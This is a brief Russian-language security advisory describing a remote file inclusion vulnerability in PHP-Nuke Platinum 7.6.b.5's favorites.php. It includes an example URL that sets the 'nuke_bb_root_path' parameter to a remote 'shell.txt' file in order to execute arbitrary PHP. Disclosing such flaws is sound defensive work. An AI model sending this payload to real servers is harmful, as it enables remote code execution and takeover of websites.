Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: PHP-Nuke Platinum 7.6.b.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «nuke_bb_root_path» сценарием favorites.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опции "register_globals" в конфигурационном файле PHP.
Пример:
http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/ Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?